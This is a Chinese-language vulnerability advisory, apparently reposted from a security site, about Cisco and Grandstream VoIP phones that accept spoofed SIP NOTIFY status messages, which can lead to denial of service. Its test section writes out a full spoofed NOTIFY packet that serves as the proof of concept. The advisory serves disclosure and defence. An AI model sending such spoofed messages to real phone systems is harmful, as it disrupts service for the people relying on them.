多家厂商VoIP电话欺骗SIP状态消息处理漏洞

2008-04-09 04:15:53来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

多家厂商VoIP电话欺骗SIP状态消息处理漏洞

发布日期:2005-07-07
更新日期:2005-07-07

受影响系统:
Cisco VoIP Phone CP-7960 3.2
Cisco VoIP Phone CP-7960 3.1
Cisco VoIP Phone CP-7960 3.0
Cisco VoIP Phone CP-7940 3.2
Cisco VoIP Phone CP-7940 3.1
Cisco VoIP Phone CP-7940 3.0
Grandstream BudgeTone 100
描述:
BUGTRAQ ID: 14174

Grandstream BudgeTone和Cisco VoIP Phone都是常见的IP电话解决方案。

多家厂商的VoIP Phone以不正确的方式处理欺骗的SIP状态消息,可能导致拒绝服务攻击。

受影响的电话没有验证NOTIFY消息的“Call-ID”、“tag”和“branch”首部,处理了欺骗的状态消息而不是拒绝这些消息。 这样如果攻击者向SIP环境中的所有电话都发送“Messages-Waiting: yes”消息的话,几乎所有的电话都会处理这些消息,导致服务器达到峰值,造成拒绝服务。

<*来源:Tobias Glemser (tglemser@tele-consulting.com)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112067698624686&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

向受害用户发送UDP消息:

Session Initiation Protocol
Request-Line: NOTIFY sip:login@10.1.1.2 SIP/2.0
Message Header
Via: SIP/2.0/UDP 15.1.1.12:5060;branch=000000000000000
From: "asterisk" <sip:asterisk@10.1.1.1>;tag=000000000
To: <sip:login@10.1.1.2>
Contact: <sip:asterisk@10.1.1.1>
Call-ID: 00000000000000@10.1.1.1
CSeq: 102 NOTIFY
User-Agent: Asterisk PBX
Event: message-summary
Content-Type: application/simple-message-summary
Content-Length: 37
Message body
Messages-Waiting: yes\n
Voicemail: 3/2\n

建议:
厂商补丁:

Cisco
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.cisco.com/warp/public/707/advisory.html

Grandstream
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.grandstream.com/y-bt100.htm

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:GNU GNATS Gen-Index任意本地文件泄露/覆盖漏洞

下一篇:Oracle Reports Server多个跨站脚本执行漏洞